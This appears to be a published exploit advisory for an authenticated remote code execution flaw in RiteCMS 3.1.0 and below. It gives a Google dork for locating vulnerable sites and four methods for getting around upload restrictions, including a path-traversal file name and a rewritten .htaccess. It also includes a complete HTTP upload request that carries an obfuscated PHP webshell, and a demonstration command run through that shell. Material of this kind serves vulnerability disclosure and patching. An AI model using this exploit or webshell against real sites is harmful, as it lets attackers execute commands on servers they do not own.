RiteCMS versions 3.1.0 and below suffer from multiple methodologies that allow for a shell upload.
844dfb5242a6e5ba1b2beb89c055b865
# Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Google Dork: intext:"Powered by RiteCMS"
# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597
"""
################
# Description #
################
# RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default.
# There are 4 ways of bypassing the current file upload protection to achieve remote code execution.
# Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved
# Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved
# Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved
By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability.
Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root
body= Content-Disposition: form-data; name="file_name"
body= ../webrootExec.php
So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php
# Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved
$ cat .htaccess
<Files *.php>
deny from all
</Files>
<Files ~ "webshell\.php$">
Allow from all
</Files>
###################################
# PoC for webshell using Method 2 #
###################################
Steps to Reproduce:
1. Login as admin
2. Go to Files Manager
3. Choose a directory to upload .php file either media or files directory.
4. Then, click Upload file > Browse..
3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess
4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory
Request:
========
POST /ritecms.v3.1.0/admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309
Content-Length: 1744
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="mode"
filemanager
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="file"; filename="webshell.pHp"
Content-Type: application/octet-stream
<?php system($_GET[base64_decode('Y21k')]);?>
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="directory"
media
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="file_name"
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="upload_mode"
1
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="resize_xy"
x
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="resize"
640
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="compression"
80
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_resize_xy"
x
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_resize"
150
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="thumbnail_compression"
70
-----------------------------410923806710384479662671954309
Content-Disposition: form-data; name="upload_file_submit"
OK - Upload file
-----------------------------410923806710384479662671954309--
####################
# Webshell access: #
####################
# Webshell access via:
PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id
# Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
"""